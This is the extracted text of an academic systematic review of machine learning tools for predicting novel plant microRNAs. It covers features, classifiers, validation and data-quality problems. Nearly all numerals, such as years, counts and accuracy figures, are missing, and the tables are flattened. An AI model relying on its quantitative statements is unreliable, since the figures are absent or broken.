has never been more important for the focused characterization of plant micrornas. production levels for many of the world’s crops are under threat from increases in global temperatures, changing patterns of rainfall and extreme weather events such as droughts, heatwaves and heavy rainfall (mall, gupta & sonkar, ). a meta-analysis of over , simulations for wheat, rice and maize has indicated that an increase of just degrees will cause losses in aggregate production (challinor et al., ). between – , the intergovernmental panel on climate change (ipcc) reports with high confidence that global temperature increases of . degrees is likely to become a reality if current rates of temperature changes are maintained (hoegh guldberg et al., ). although this will result in smaller net reductions for maize, rice, wheat and potentially other cereal crops than would be observed with a degree rise, the risk to global food security and economics is not to be overlooked, especially regarding staple crops such as wheat, that are required to increase in production levels to meet projected increases in global demands (liu et al., ; ray et al., ; hoegh guldberg et al., ; challinor et al., ). mirnas are known to be involved in several important stress-response pathways including drought, heat and salinity. for example, in the model plant arabidopsis thaliana, upregulation of mir is critical for thermotolerance (guan et al., ), downregulation of mir is observed in drought-tolerant varieties and overexpression of osa-mir c inferred increased salt and alkali tolerance (gao et al., ). however, it has become clear that plant species show remarkable variety in the relationship between mirnas and their role in stress tolerance. for example, osa-mir c in rice (oryza sativa) showed the same response as a. thaliana in increased salinity and alkaline environments (gao et al., ). however, for other mirnas such as mir the relationship between their expression and drought tolerance appears to vary between species. in a. thaliana and the model legume medicago truncatula, mir is down-regulated in response to drought (li et al., ; trindade et al., ; sunkar, li & jagadeeswaran, ). contrastingly, in rice and tomato (solanum lycopersicum cv. ailsa craig), drought stress led to the up-regulation of mir- (zhao et al., ; zhang et al., ). additionally (zhou et al., ) identified a further mirnas that showed opposite expression patterns in a.thaliana in response to drought stress. the observed interspecies variation in mirna activity in response to stressful stimuli demonstrates that there is a need for the discovery and functional characterization of mirnas for each species of plant of interest. thanks to advancements in next-generation sequencing (ngs) technology and interdisciplinary collaborations, the rapid identification of species-specific plant mirnas and their expressions in response to stimuli is now possible (liu et al., ; unamba, nag & sharma, ; hu, lan & miller, ). ngs is both high throughput and highly manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. accurate, facilitating the identification of sequence variations and novel mirnas (hu, lan & miller, ). however, many computational methods such as those described in (evers et al., ; an et al., ; hackenberg, rodriguez-ezpeleta & aransay, ) only allow for homology-based identification of mirnas. this means the tools are not able to take full advantage of the available information in the sequencing data, such as novel mirna identification. as such, numerous ab initio methods have been developed to facilitate the discovery of novel mirnas. however, caution is being urged when interpreting the results of such computational inferences of biological data (taylor et al., ; taylor et al., ). the generation of computational tools to identify mirna sequences requires biological assumptions to underpin the methods and, as with all new areas of research, these assumptions change with new evidence over time (ambros et al., ; meyers et al., ; axtell & meyers, ). this systematic review surveys the computational methods that facilitate the ab initio identification of plant mirnas over the last decade ( – ). it seeks answers to five research questions that aim to elucidate the developments, reliability and validity of the methods used, and considers potential opportunities for future developments in the computational identification of mirnas. methodology this systematic review focuses on the literature that was published between and . this time range was considered to collect and analyze the recent methodologies developed on ab initio plant mirna identification. the following sections contain the steps of the review protocol: research questions, search strategy, selection criteria, data extraction and quality assessment. research questions this review is intended to answer the following research questions: (q ) how many methods were developed during the past decade? (q ) what kind of machine learning algorithms and features were used? which models/features performed well? (q ) how accurate and reliable are the developed models? (q ) what kind of computational and/or experimental validation methods were used? how appropriate are those validation methods? (q ) what are knowledge gaps, open problems and/or opportunities? search strategy the search strategy was used to identify plant mirna prediction methods developed between and in databases of ieee xplore (https://ieeexplore.ieee.org/xplore/ home.jsp), science direct (https://www.sciencedirect.com/), pubmed (https://www.ncbi. nlm.nih.gov/pubmed?otool=msubolib), web of science (http://www.webofknowledge. com/) and google scholar (https://scholar.google.com/). the following terms were used for the literature searches: ‘‘novel mirna identification in plants’’ (including variations of the word ‘‘identification’’ such as ‘‘prediction’’ and ‘‘discovery’’) and ‘‘computational method’’. they were used as queries as shown below. manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://ieeexplore.ieee.org/xplore/home.jsp https://ieeexplore.ieee.org/xplore/home.jsp https://www.sciencedirect.com/ https://www.ncbi.nlm.nih.gov/pubmed?otool=msubolib https://www.ncbi.nlm.nih.gov/pubmed?otool=msubolib http://www.webofknowledge.com/ http://www.webofknowledge.com/ https://scholar.google.com/ http://dx.doi.org/ . /peerj-cs. table article selection criteria. inclusion criteria exclusion criteria studies that use machine learning algorithms studies that only use sequence homology studies that solely use plants or include plant data studies that use animal or unspecified species datasets published journal articles or conference proceedings literature reviews/surveys on the subject and unpublished articles (novel mirna identification in plants) and (computational method) these search terms were utilized to narrow down the large number of mostly-irrelevant retrieved articles from databases such as science direct and google scholar, into mostly relevant articles. selection criteria the selection criteria used for the review is shown in table . the review process began with a study search procedure. from the initial search results to the final list of primary studies, the procedure was performed as follows. . the article search was carried out using the aforementioned search strategy mentioned above. a total of , search results were found from all of the databases. that is considering only search results from google scholar as it gave over , results per search term. in order to narrow-down from , google scholar results, we restricted the output to the first ten pages of the search. this resulted in articles that are most relevant to the query. • ieee xplore: • science direct: • pubmed: • web of science: • google scholar: . out of the search results from the databases, articles were first filtered by assessing the title’s relevance. if deemed relevant to the subject, it was included in the initial list. . secondly, the abstracts were assessed for relevance. this resulted in articles. . finally, the selection criteria (see table ) were applied on the remaining articles and articles were retained as the final list (referred to as the primary list). data extraction table outlines the criteria used for data extraction from the primary studies. data and general information from each article were extracted to enable the five research questions to be addressed (see research questions). quality assessment the study quality assessment was performed on all primary studies and was based on six questions as detailed: manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table data extraction form. search focus data item description article details title, authors, published year and publication venue article type journal article or conference proceedingsgeneral study description introduction of the study q data plant data only methods and methods including plant data datasets dataset source, positive and negative example datasets, and species features types of features used machine learning algorithms type of machine learning algorithm used for classification q feature selection methods used to select/extract features for the model q performance metrics accuracy values and other performance measurements q validation methods cross-validation and experimental validation methods q future work suggested future work in conclusion section and other aspects that are not being addressed (qa ) are all the considered data being used for the model (without sample selection)? a ‘‘sample’’ refers to a single mirna sequence considered for the experiments. in machine learning, they are also referred to as an example or an instance of data. (qa ) do they mention any information about the negative dataset used? a typical machine learning model require positive and negative examples, which are sequences labeled as mirnas or none-mirnas, respectively. this question refers to any information about the negative dataset such as what kind of sequences were considered as negatives and how many examples were considered. (qa ) are there any feature selection methods considered in each method? rather than using all the features gathered, did the study use a feature selection method to select a subset of most effective features for model development. (qa ) do they conduct any experimental validation of their findings? did the study use validation methods to experimentally validate the findings (mirna predictions) output from their machine learning models. (qa ) are the results of the performance evaluation quantified? did the study present their results using a typical performance measure such as accuracy used in machine learning. (qa ) is the study focused only on plant mirna identification? did the study solely use plant mirna sequences for developing the prediction model or have they considered a mixture of plant and animal mirnas. results figure is the flow diagram depicting the study selection process with the numbers described in the methodology (liberati et al., ). table illustrates the results of the quality assessment process. none of the articles answered ‘‘yes’’ to all the six questions. zou et al. ( ) does not satisfy any quality manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure prisma flow diagram (liberati et al., ). full-size doi: . /peerjcs. /fig- assessment category, but it is still considered for the systematic review in order to analyze their methodology. tables and shows the information collected from the primary studies during the data extraction process. table s shows the publication venues of the primary articles. according to the table, bmc bioinformatics journal has the most number of articles selected. the answers to all the research questions are being presented below based on the primary studies selected. (q ) how many methods were developed during the past decade? the primary list of articles consisted of studies which were focused on the problem of novel plant mirna identification. of these, studies were focused solely on plant mirna identification. the remaining studies focused on both plant and animal mirna identification, with plant datasets either used to train the machine learning models or used only to test the model (after training with non-plant datasets). the plant-focused studies used datasets from several different species. meng et al. ( ) considered all the plant datasets available in mirbase (a mirna database) by (kozomara & griffiths-jones, ). breakfield et al., ; silla, de o camargo-brunetto & binneck, and sunkar et al., , each worked on one specific plant species (arabidopsis, soybean manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. table quality assessment results. reference qa qa qa qa qa qa tseng et al. ( ) no yes yes yes yes yes yousef et al. ( ) yes yes yes no yes yes yousef, allmer & khalifa ( ) yes yes yes no yes yes breakfield et al. ( ) no yes no yes yes yes douglass et al. ( ) no yes no yes yes yes sunkar et al. ( ) no yes yes yes no yes abu-halaweh & harrison ( ) yes yes yes no yes no guan et al. ( ) yes yes yes no yes no meng et al. ( ) no yes yes no yes yes williams, eyles & weiller ( ) no yes yes no yes yes xuan et al. ( ) no yes yes no yes yes yao et al. ( ) yes yes no no yes yes koh & kim ( ) yes yes no no yes no silla, de o camargo-brunetto & binneck ( ) no yes no no yes yes wu et al. ( ) no yes yes no yes no zhong et al. ( ) yes yes no no yes no kadri, hinman & benos ( ) no yes no no yes no vitsios et al. ( ) yes no no no yes no xiao et al. ( ) no yes no no yes no zou et al. ( ) no no no no no no and rice respectively). therefore, they used only that plant species or included a few additional species to the dataset. as there is not an abundance of species-specific mirna data available, most studies used a combination of plant species data. the primary list contains nine studies that used both plant and animal datasets. these studies used the same features for both kingdoms mirna identification. this might be due to the lack of data in plants. therefore, researchers tend to combine animal datasets in order to get a larger dataset, and they consider the same features. this results in a number of tools that are for both animals and plants that do not consider the differences between their mirnas. figure shows the distribution of article publication on the subject in the past decade. most plant only publications occurred in and , no publication was published on novel plant mirna identification. figure shows the distribution of specific plant species used in the primary studies. all the studies used both positive and negative datasets in their methods. whilst plant mirna data was used for the positive set, a range of data was used for the negative set, ensuring they were free of real mirna sequences. nine studies used protein coding regions to collect pseudo mirnas for their negative dataset. as almost all reported mirnas are found in the non-coding regions of the genome, these sequences are assumed as pseudo mirna data (xuan et al., ). guan et al. ( ), koh & kim ( ), xiao et al. ( ), yousef, allmer & khalifa ( ) and yousef et al. ( ) used the negative datasets from manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table data extraction results. primary study article type data dataset source number of species used negative datasets feature selection methods xuan et al. ( ) j p mirbase , phyto- zome database protein coding re- gion of a.thaliana and g.max genomes considering informa- tion gain and feature redundancy yousef et al. ( ) j p mirbase , in brassicaceae and training data from xuan et al. ( ) samples from xuan et al. ( ) using svm-rfe (re- cursive feature elimina- tion) implemented in weka, selected top ranked features. silla, de o camargo-brunetto & binneck ( ) c p plant microrna database, deepbase, phytozome glycine max, athaliana, med- icago truncatula arabidopsis thaliana snorna sequences from deepbase and rna sequences randomly generated n/a meng et al. ( ) j p mirbase from coding regions of species using back svm-rfe, / features were selected breakfield et al. ( ) j p mirbase , ncbi se- quence read archive arabidopsis from intergenic or in- tronic genomic loca- tions n/a douglass et al. ( ) j p mirbase , gene ex- pression omnibus (geo) smrna sequences re- maining after known mirna filtering n/a yao et al. ( ) j p mirbase , ensem- blplants database v from coding region of species selected subsets of fea- tures (based on types of features) to check the impact of those fea- tures tseng et al. ( ) j p mirbase , gene ex- pression omnibus, tair, rgap arabidopsis and rice tested with different combinations of fea- tures (based on type) williams, eyles & weiller ( ) j p mirbase , tigr plant transcript as- semblies from expressed se- quence tags (est) of species n/a sunkar et al. ( ) j p mirbase , tigr rice genome annotation database rice rice coding sequences from tigr wrapper-based method. using weights from svm (continued on next page) m anuw eera etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) primary study article type data dataset source number of species used negative datasets feature selection methods yousef, allmer & khalifa ( ) j p mirbase , from xuan et al. ( ) using svm-rfe (re- cursive feature elemi- nation) implemented in weka, selected top ranked features. xiao et al. ( ) j eval: p+v mirbase all mirbase from previous work (human data) n/a koh & kim ( ) j a+p mirbase mirbase excluding virus pseudo hairpins form micropred n/a wu et al. ( ) j a+p mirbase all mirbase random start sequences; identical to real mirna but start position is shifted by nt tested for the high- est raninking features zou et al. ( ) j a+p mirbase all mirbase tested on different fea- ture sets zhong et al. ( ) j a+p previous studies (mir- base , , ) from previous studies previous methods n/a guan et al. ( ) j a+p mirbase from protien coding regions (from previous studies) n/a vitsios et al. ( ) j a+p mirbase n/a abu-halaweh & harrison ( ) c a+p previous work (rfam etc.) human coding regions fdt integrates two measures, classifica- tion ambiguity and fuzzy information gain to identify the set of the most significant features kadri, hinman & benos ( ) j test set: p microrna registry v . , ucsc genome browser coding regions and random genomic seg- ments from genome obtained by ucsc genome browser n/a notes. j, journal; c, conference proceeding; p, plant; a, animal; v, virus; n/a, feature selection not used. m anuw eera etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table data extraction results ( ). primary study input types of features types of ml models predicted output key results experimental validation sequence structural thermodynamic/ stability other discriminative probabilistic p re ci si on r ec al l f -s co re sp ec if ic it y g eo m et ri c m ea n a cc u ra cy a u c xuan et al. ( ) pre-mirna triplet svm - rbf kernel pre-mirna . . . . yousef et al. ( ) pre-mirna existing; motif features existing existing svm - rbf kernel pre-mirna . . . silla, de o camargo-brunetto & binneck ( ) pre-mirna svm - rbf kernel pre-mirna meng et al. ( ) pre-mirna and mature mirna svm pre-mirna and mature mirna . . . . breakfield et al. ( ) small rna including all types naïve baye’s mature mirna vs nc- rna . . rt-pcr etc. douglass et al. ( ) small rna naïve baye’s mature mirna . rt-pcr yao et al. ( ) pre-mirna including all types svm - rbf kernel pre-mirna . . . . , tseng et al. ( ) small rna svm mature mirna . . . . rt-pcr williams, eyles & weiller ( ) mature mirna decision tree mature mirna . . sunkar et al. ( ) small rna to -mer seq. motifs svm - linear mature mirna northern analysis yousef, allmer & khalifa ( ) pre-mirna n-grams, motifs svm and k-means mature mirna . xiao et al. ( ) pre-mirna network features of stem-loop random forest pre-mirna . . . . koh & kim ( ) pre-mirna svm - rbf kernal pre-mirna . wu et al. ( ) pri-mirna , , mature, pre, pri-mirna , , mature, pre, pri-mirna , , mature, pre, pri-mirna other features svm mature mirna regions zou et al. ( ) mature mirna , triplet random forest mature mirna and their family zhong et al. ( ) pre-mirna svm pre-mirna . . . guan et al. ( ) pre-mirna misc. covering all types adaboost pre-mirna and mature mirna . . . vitsios et al. ( ) mature mirna covering all types random forest mature mirna . - . abu-halaweh & harrison ( ) pre-mirna including all types fuzzy decision tree pre-mirna . . . kadri, hinman & benos ( ) pre-mirna parameters hierarchical hmm pre-mirna notes. f score, *(precision*recall)/(precision+recall); geometric mean, sensitivity*specificity. m anuw eera etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure distribution of publications in the past decade. . full-size doi: . /peerjcs. /fig- figure plant species used (even though arabidopsis belongs to the brassicaceae family, it has been used in significant amount of work as it is a model plant; therefore, it has been added to the figure sepa- rate from brassicaceae). full-size doi: . /peerjcs. /fig- manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. previous studies which were already available. yousef, allmer & khalifa ( ) discusses a one-class classifier for plant mirnas where they only used the positive data set. however, for the comparison with a binary classifier, they needed a negative dataset. the remaining studies either randomly generated negative datasets or used other non-coding rnas such as small nucleolar rna (snorna), transfer rna (trna) etc. (q ) what kind of machine learning algorithms and features were used? which model- s/features performed well? many of the studies used the same or similar sets of features consisting of sequence-based, structural and thermodynamic features. the studies use either the same set of features from previous studies or extend them by adding new features to enhance performance. the sequence-based features often consist of nucleotide/di-nucleotide frequencies, motifs, n-grams, gc content and sequence length among others. the structural features primarily consist of features as described in xue et al. ( ) and also minimum free energy (mfe) measures. thermodynamic features include the structure entropy and enthalpy measures. the vast majority of studies utilize a combination of various structural and sequence-based features which may aid in increasing the chances of identifying a correct mirna, despite their diversity within the plant kingdom. williams, eyles & weiller ( ) and kadri, hinman & benos ( ) have used sliding windows of size ranging – nt (known plant pre-mirna are below nt according to williams, eyles & weiller ( ) and for kadri, hinman & benos ( ), most of the pre-mirna were covered when the window size is nt) to scan genome sequences for folding into hairpin structures and then collect structural features. therefore, this range can be used for scanning the whole genome of a specific plant spices. plant precursor sequences have varying sizes of secondary structures but there is no unified technique reported for dealing with the issue. williams, eyles & weiller ( ) select the size of the majority of pre-mirna in mirbase (< nt). kadri, hinman & benos ( ) use nt minimum for selecting/ filtering pre-mirnas. xuan et al. ( ) considered different ranges of lengths to get the majority of sequence information. wu et al. ( ) used nt as the length of pre-mirna. according to meng et al. ( ), plant pre-mirna can range from – nt. therefore, many of the studies have used a window size that is being guided by this length range to select the set of pre-mirna for their studies. apart from those features, xiao et al. ( ) focused on other methods to achieve structural features using network parameters. a few remaining studies haven’t described the feature set with adequate information. but most of the studies tend to follow the same set of features which were proven to be effective through previous studies. figure shows the distribution of types of features used in the primary studies. different studies have been conducted to show the impact of different sets of features. some methods show that thermodynamic features (yao et al., ) are better while another reports that sequential features (yousef et al., ) are better. however, there is no concrete answer or common theme since there aren’t many studies comparing different feature types for plant mirna prediction. whilst most studies utilized features extracted from data generated from various plant species, a few did use features extracted from non-plant species and then used this data manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure types of features used. full-size doi: . /peerjcs. /fig- to test their models’ performance on other species. both guan et al. ( ) and kadri, hinman & benos ( ) used human mirna data to train their models and then tested model performance on several plant species including the model plant species arabidopsis thaliana as well as oryza sativa. both methods performed well on these species, with (kadri, hinman & benos, ) achieving . % and . % of correctly predicted mirna for a.thaliana and o.sativa respectively. guan et al. ( ) was able to achieve . % accuracy for a.thaliana and . % for o.sativa as well an impressive % accuracy for chlamydomonas reinhardtii. similarly, (vitsios et al., ) demonstrated an accuracy of between . % and . % for the identification of plant mirnas using a model trained on animals. xiao et al. ( ) was also able to achieve similar results in the detection of mirna precursors trained on animal data, demonstrating an accuracy of . % for plant data. the success of these studies indicates that plant and animal mirnas do share some conserved sequence and structural characteristics. the studies considered in this review all used machine learning algorithms to identify novel mirnas in plant species. the selected primary studies used the following machine learning algorithms in their methods. • support vector machine (svm) (kecman, ) • random forest (breiman, ) • naive bayes (runkler, ) • decision tree (swain & hauska, ) • hierarchical hidden markov model (hhmm) (fine, singer & tishby, ) manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure machine learning algorithms used. full-size doi: . /peerjcs. /fig- • adaboost (freund & schapire, ) out of the above algorithms, studies used svm for their model. in general, models using svms have provided good overall performances in mirna identification. three other studies used random forest algorithm. the machine learning algorithms used are limited to the above list in the past decade. figure shows the distribution of machine leaning algorithms used in the past decade on identifying novel mirnas in plants. the inputs to these machine learning models consist of either pre-mirna, mature mirna or small rna sequences. meng et al. ( ) used both pre-mirna and mature mirna as the inputs to develop an integrated model for both mirna and pre-mirna prediction. methods such as (tseng et al., ; douglass et al., ; breakfield et al., ) used small-rna sequencing data for their models. these methods still output the predicted mirnas. (q ) how accurate and reliable are the developed models? considering the overall results reported by the authors, almost all the methods performed well in identifying novel plant mirnas –many of them achieved very good accuracy values. most of the studies used accuracy, recall, sensitivity and specificity to illustrate the performance of the model. eleven studies used accuracy as a performance measure and of those studies achieved accuracies above %. even though the reported performances are not directly comparable, the highest accuracy of . % was reported by yousef et al., manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. ( ). considering the results presented by each study, all of them performed well and therefore, are seemingly reliable. all of the plant only methods perform well with accuracy values of above %. these performance values are based on the considered specific plant species and may not work for any species. also, there is a potential for improving the performances by considering feature selection and advanced machines learning techniques. note that the analysis presented here is only based on the performances reported by the authors. while it may look like that many models are performing very well with performance values above %, we would like to highlight the fact that more than % of the models are developed/ tested with/on plant species with relatively less complex genomes such as a. thaliana (see fig. ). therefore, we raise the concern that these models may not work for more complex plant genomes such as wheat. with the recent sequencing of the whole wheat genome, identifying novel mirnas and their functions is of utmost importance. but none of the existing methods reviewed in this survey focuses on complex plant species. the lack of high-quality plant data in popular knowledgebases such as mirbase (kozomara, birgaoanu & griffiths-jones, ) (which leads to lack of adequate training data) may be hindering the bioinformatics community from developing plant-based models for complex plant genomes. (q ) what kind of computational and/or experimental validation methods were used? how appropriate are those validation methods? except for two studies, all the other studies used a cross-validation technique for evaluating their machine learning models. five-fold cross validation was used by eight studies while six studies used -fold cross validation. using cross validation is helpful in performance evaluation of the developed models. experimental validation of putative novel mirna’s is an important part of mirna prediction. of the studies evaluated in this systematic review, only four (tseng et al., ; breakfield et al., ; douglass et al., ; sunkar et al., ) experimentally validated the presence of the novel mirnas predicted by their machine learning methods. the most popular method was stem-loop pcr, employed by tseng et al. ( ), breakfield et al. ( ) and douglass et al., ). tseng et al. ( ) additionally utilized qpcr and (sunkar et al., ) employed northern blot analysis and small rna blots. (tseng et al., ) confirmed out of predicted mirnas to be real mirnas while (sunkar et al., ) has tested and confirmed seven out of predicted mirnas. breakfield et al. ( ) and douglass et al. ( ) experimentally validated of their predictions each to be true mirnas. (q ) what are knowledge gaps, open problems and/or opportunities? computational mirna identification is still a relatively young branch of biology and as such, it contains many knowledge gaps, open problems and opportunities. however, one of the most pressing is the need for the biological validation of computationally predicted mirnas. it’s become clear from studies conducted by axtell & meyers ( ), taylor et al. ( ) and taylor et al. ( ) that many of the mirna sequences deposited in databases such as mirbase (kozomara & griffiths-jones, ) are biologically implausible. taylor et manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. al. ( ) labeled one-third of all annotation plant mirna loci and % of all plant mirna families as questionable in mirbase release (kozomara & griffiths-jones, ). similarly, (axtell & meyers, ) found that only . % of land plant mirna loci and . % of land plant families are labeled as high confidence in mirbase version (kozomara & griffiths-jones, ). whilst there are many factors responsible for these observations, one of the causes may simply be developments in the understanding of mirna biology. the last ten years have seen the release of two guidelines for the identification of plant mirna identification, one of which was released in and the other in (meyers et al., ; axtell & meyers, ). prior to these releases, the first mirna identification guide was produced in (ambros et al., ). as all computational identification methods are based upon biological assumptions, it stands to reason that the use of tools that are based on inaccurate or out-of-date assumptions will yield biologically questionable results. whilst this unmistakably calls for researchers to thoroughly inspect the methods of their chosen tools to discern the assumptions upon which it is based, this is not always a straightforward task. most of the tools in this study made no reference to a specific guideline that was followed, which is of course not a necessity and in some cases would be inappropriate. the sources used may indeed be in accordance with the most recent guidelines or they may be expanding upon those guidelines, such as performed in yousef, allmer & khalifa ( ), who investigated motif-based features for ab initio plant mirna detection. additionally, if there have been developments in the understanding of mirna biology that have succeeded the information in the guidelines, it would, of course, make little sense to blindly abide by the guidelines. an additional complication is a lack of clarity in the methods. these tools are both biologically and computationally complex, and understanding the methods that underlie them may not be a straightforward task for experts of various domains. there is a need to ensure that the methods of such tools are written in such a way as to make clear the underlying assumptions. failure to do so could lead to a tool being inappropriately selected, disregarded or improperly used. in some cases, this will require the user of such tools to read the proceeding studies that have been referenced in place of the method specifics. another cause of the questionable mirna annotations that are deposited in databases is the unquestionable use of the databases themselves (taylor et al., ). as discussed previously, many of the annotations within databases such as mirbase are questionable at best and at worst incorrect (taylor et al., ; taylor et al., ; axtell & meyers, ). as such, an additional opportunity for improvement presents itself to both computer scientists and biologists; the selection of high-confidence mirna’s to be used as benchmarks. of the papers discussed here all used either mirbase or its precursor the microrna registry database, of which seven used mirbase version or . of these papers; (yao et al., ; yousef, allmer & khalifa, ; yousef et al., ; vitsios et al., ; douglass et al., ; tseng et al., ; koh & kim, ), only (douglass et al., ) makes reference to the confidence of the sequences used. whilst they do not explicitly say they used ‘‘high confidence’’ sequences, they specify they required either one or two types of experimental evidence dependant upon species and available evidence (douglass et al., ). the manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. addition of a ‘‘high confidence’’ tag was made available shortly after the release of mirbase version , and it allows users to ‘‘vote’’ if they agree with the ‘‘high confidence’’ tag or not (kozomara & griffiths-jones, ). for studies that used mirbase prior to version , the use of experimentally-validated mirnas shows that the mirna sequences used were of high confidence. however only (meng et al., ; wu et al., ; douglass et al., ) specify the use of experimentally validated sequences. whilst utilizing only high-confidence mirnas will increase the manual work required to obtain data from databases and will likely significantly decrease the number of available sequences which may reduce statistic power. however, it may be a necessity to reduce the rate at which false positive mirnas are being deposited into databases. whilst it may be outdated due to further mirbase updates, (taylor et al., ) provides a link to a library of valid plant mirnas in fasta format which can be utilized and/or built upon as a benchmark for future plant mirnaomes. another important factor in the influx of incorrect annotations is the unquestioning inclusion of all bioinformatically predicted mirnas (taylor et al., ). it is very likely that computational prediction programs will produce false positives, and the only way to avoid the inclusion of these incorrect annotations is the manual inspection of each positively identified mirna against the most recent set of guidelines, such as those written by axtell & meyers ( ) and taylor et al. ( ). whilst this process will massively increase the manual requirements for mirna identification, it will go some way in preventing the continuous influx of incorrectly annotation sequences into public databases (taylor et al., ). however, the best form of verification of the biological presence of a mirna is experimental validation. of the papers discussed in this review, only four (tseng et al., ; douglass et al., ; sunkar et al., ; breakfield et al., ) incorporated some form of experimental validation. of these, only two studies were based only upon the development of a mirna prediction model or classifier (tseng et al., ; douglass et al., ). both of these studies utilized small rna-seq data which may still yield false positive mirna predictions and indeed, this is demonstrated by the experimental validation of predictions that used small rna-seq data. for example, tseng et al. ( ) experimentally confirmed the presence of only out of predicted novel mirnas within two biological replicates and douglass et al. ( ) was able to validate only two out of high scoring putative mirnas using their stringent criteria. whilst it is likely that experimental validation will yield some level of false negative results, it may still be a necessity if progress is to made towards mapping the genuine mirnaome of a given species. due to the rising concern of poor mirna annotations in databases, it is likely that many changes will be made by both database curators and researchers. for example, axtell & meyers ( ) recommend that all mirnas identified through a homology-based approach only should be labeled as ‘‘putative’’. in addition, the authors of mirbase (kozomara & griffiths-jones, ) are aiming to incorporate a tiered confidence structure for mirna entries as well as a text-mining based approach to categorize mirna related articles and extract the biological meanings from the text. these changes may result in the alterations of mirna annotations and as such, it may benefit biologists to utilize the mirbase change log function available from mirbase or tools such as the mirbase tracker (van peer et al., ; kozomara & griffiths-jones, ). the use of these tools will aid biologists in manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. understanding the annotation history of a given mirna, and perhaps, in the future provide information regarding changes in supporting evidence. machine learning and feature selection methods related issues also exist in this field. different groups have used various techniques for selecting negative data without having performed a comprehensive study on the most appropriate technique. but since the quality of the negative data heavily impacts machine learning models, this should directly be addressed. also, as mentioned before, many authors use features proven to be most effective for animals on models developed for plants without comprehensive evaluation. this likely impacts the performance due to the noticeable differences between plant and animal mirna sequences (yao et al., ; douglass et al., ). on top of this, some models have not considered feature selection at all (silla, de o camargo-brunetto & binneck, ; williams, eyles & weiller, ; xiao et al., etc.). as mentioned above, most of the methods haven’t conducted experimental validation of the novel mirnas predicted by the computational models. in fact, only methods have validated their findings (breakfield et al., ; douglass et al., ; tseng et al., ; sunkar et al., ). machine learning methods are not perfect; it is important to confirm if the predictions of the model are accurate in order to claim the finding of novel mirnas. also, the use of feature selection methods would be beneficial rather than using all available features for the model. but only some of the methods have used feature selection techniques. considering the differences between plant and animal mirna sequences, focusing on features specific to plants (instead of using the features that were found to work well for animal mirnas), and identifying features effective for more complex genomes such as wheat and barley would be essential. use of other sophisticated machine learning algorithms would be beneficial in enhancing the performance of the tools. apart from the machine learning algorithms mentioned in the primary studies, other opportunities are available with advanced models such as neural networks (abe, ) and deep learning (lecun, bengio & hinton, ). however, there needs to be a large dataset in order to use deep learning models and given the sparsity of experimentally validated sequences, this may not be an appropriate route at this time. as such, semi-supervised models that learns from both labeled and unlabeled examples may provide an added advantage. due to the issues surrounding finding quality negative data, one-class classification or pu learning models (using positive and unlabeled samples) (wu et al., ) may also be a fruitful choice. conclusion in this work, we have conducted a systematic review of ab initio plant mirna identification tools that have been developed over the last decade. to achieve this, five questions were posed which aimed to elucidate the developments and assess the reliability and validity of the various methods used to identify novel plant mirnas. in total there are studies that addressed plant mirna identification using machine learning. although it is a relatively small number of studies, most of the studies report promising results in the range of % of accuracy or above obtained through computational validation. only % of the studies focused on only plants and even fewer of them focused manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. on a specific plant species. this demonstrates a pressing need for plant specific and species specific methods. compared with the dataset available for animal species, there is a relatively small number of experimentally verified plant mirnas. this limits the authors and developers of machine learning tools, which require sometimes copious amounts of data for the training of their models. recognizing the most informative features that are based on unique features of plant datasets will likely increase the accuracy of those methods. whilst many studies continued using features from previous studies resulting in a large set of features, it’s important to verify that the assumptions that were made when the data was created are still in line with the present understanding of mirna biology. while it is true that the models are performing well, they are being tested on low quality data. so, we do raise this as a major concern. it is a well-known problem that a considerable number of predicted mirnas are false predictions (taylor et al., ). so, cleaning up the current knowledge bases should be a top priority. otherwise, these errors will be propagated as well. an additional challenge is that not all the developed software are accessible by the public. some of them do not work as advertised due to technical issues and that further decreases the number of available methods with respect to plant mirna prediction. given that the intended audience of these tools would be biologists (i.e., non-experts in software development), extreme care must be taken in improving the availability, user friendliness and reliability. for the models involving different parameter options, guidelines must be provided in finding the optimum parameter values for the dataset of interest. acknowledgements the authors would like to gratefully acknowledge the assistance provided for reviewing the manuscript by dr. jennifer lachowiec, assistant professor at the department of plant sciences and plant pathology, montana state university. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • buwani manuweera performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • gillian reynolds performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • indika kahanda conceived and designed the experiments, authored or reviewed 